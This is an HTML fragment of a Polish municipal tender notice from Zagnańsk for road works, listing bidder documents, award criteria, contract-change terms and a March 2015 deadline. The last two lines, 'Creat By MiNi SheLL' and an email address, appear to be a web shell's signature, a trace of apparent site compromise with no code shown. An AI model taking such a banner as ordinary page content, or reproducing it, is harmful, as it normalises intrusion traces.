<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Kopia wpłaty wadium</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2) Zamawiający przewiduje możliwość dokonania zmian postanowień  zawartej umowy w stosunku do oferty  na podstawie,w przypadku wystąpienia niżej wymienionych okoliczności w trakcie zawarcia umowy  takich jak:
a) zmiany zakresu robót - jeżeli z wnioskiem takim wystąpi Zamawiający lub  zmiana taka  stanie się konieczna z przyczyn technicznych,
 b)  zmiany wynagrodzenia - jeżeli nastąpi zmiana robót lub wystąpią roboty  zamienne generujące zmianę kosztów, jak również w przypadku urzędowej zmiany wysokości stawki podatku VAT.
 c)  gdy wprowadzenie zmian jest korzystne dla Zamawiającego,
d)  wystąpienie zdarzeń losowych (powstałe na  wskutek natury),
e)  wystąpienie zmian których konieczność wprowadzenia  będzie  wynikała z wymagań instytucji współfinansujących realizację przedmiotu umowy,
f)  przesunięcie terminu wykonania robót, polegające na jego  skróceniu, będzie możliwe jedynie w przypadku wystąpienia  okoliczności, które  prowadzić będą  do szybszego tempa  wykonanych  przez wykonawcę  robót objętych przedmiotowym zamówieniem. Okoliczności te jednak mogą dotyczyć jedynie zmiany terminu wykonania robót, a nie mogą  wpływać na ich zakres. Ustalenie nowego terminu wykonania  robót wymaga sporządzenia  stosownego aneksu
 g) zmiana osób wskazanych w umowie z imienia i nazwiska    odpowiedzialnych za  realizację umowy, o których mowa  w § 3 niniejszej umowy (załącznik nr 7 do SIWZ).
 Wszystkie powyższe postanowienia stanowią katalog zmian, które przed wprowadzeniem do umowy wymagają zgodnej akceptacji stron. Zmiany zostaną  wprowadzone do  umowy  w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagnasnk.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gmina Zagnańsk, ul.Spacerowa 8, 26-050 Zagnańsk pokój nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2015 godzina 10:30, miejsce: Otwarcie ofert jest jawne i nastąpi w dniu 6 marca 2015 r., o godz. 1030
W Urzędzie Gminy w Zagnańsku, ul. Spacerowa 8, 26 - 050 Zagnańsk - sala konferencyjna, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja współfinansowana ze Środków Narodowego Programu Przebudowy Dróg Lokalnych -Etap II. Bezpieczeństwo -Dostępność - Rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com